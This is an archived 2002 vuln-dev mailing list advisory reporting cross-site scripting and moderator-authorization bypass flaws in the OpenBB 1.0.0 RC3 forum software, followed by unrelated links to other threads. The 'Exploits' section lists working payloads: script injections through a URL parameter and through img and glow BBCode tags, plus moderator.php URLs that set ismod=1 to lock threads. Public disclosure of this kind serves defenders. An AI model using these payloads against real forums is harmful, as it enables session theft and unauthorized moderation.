Security holes in OpenBB

From: frog frog (leseulfrog@hotmail.com)
Date: 05/23/02 

Date: 23 May 2002 19:31:05 -0000
From: frog frog <leseulfrog@hotmail.com>
To: vuln-dev@securityfocus.com
('binary' encoding is not supported, stored as-is)

Product :
OpenBB
http://www.prolixmedia.com

Versions :
1.0.0 RC3 (and less ?)

Problems :
- XSS
- Access to moderators' options

Exploits :
- /myhome.php?action=messages&box=<*form%20name=a><input%
20name=i%20value=XSS></*form><*script>alert
(document.a.i.value)</*script>

- [img]http://" onerror="[SCRIPT]"[/img]

- [glow tcolor=')" onmouseover="[SCRIPT]" nothing="('hop,
fcolor=red, size=100]HUHUHU[/glow]

- moderator.php?action=lock&TID=FORUMID&ismod=1
moderator.php?action=lock&TID=FORUMID&ismod=1&status=1

- etc ...

More details in french :
http://www.ifrance.com/kitetoua/tuto/OpenBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%
2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FOpenBB.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%
2Flanguage_tools

frog-m@n

Relevant Pages

  • Security holes in ForamiX
    ... ('binary' encoding is not supported, ... Admin access ... More details in french: ... translated by google: ...
    (Vuln-Dev)
  • Chirac unveils his grand plan to restore French pride
    ... The French president, Jacques Chirac, yesterday unveiled what he hopes ... European search engine to rival Google. ... funding for a series of innovative grands projets, ...
    (soc.culture.thai)
  • OT Usenet and RSSIR (was Re: Being in the situation of having two mommies...)
    ... WL>> This is a Google group. ... Google has provided a web interface to Usenet ... newsgroups via its Google Groups service, ... moderators are appointed in the proposal for the ...
    (rec.sport.skating.ice.recreational)
  • Re: Newsgroup back!
    ... Google gives you a confirmation that your post has ... New topic submitted to moderators of rec.arts.sf.tv.babylon5.moderated ... The NNTP provider's SMTP server can take the message, connect to the target SMTP server, and transfer it... ... It also has no way of knowing IF the SMTP server it's sending to is the CORRECT server, only that it's making a connection and delivering the message to a waiting receiver. ...
    (rec.arts.sf.tv.babylon5.moderated)
  • Re: A new math usenet group
    ... sufficient help from others as moderators? ... NTCRNK in the subject: header. ... tag specifically for Mueckenheim could be NTMNHEIM. ... I do not believe Google groups allow killfiling, ...
    (sci.math)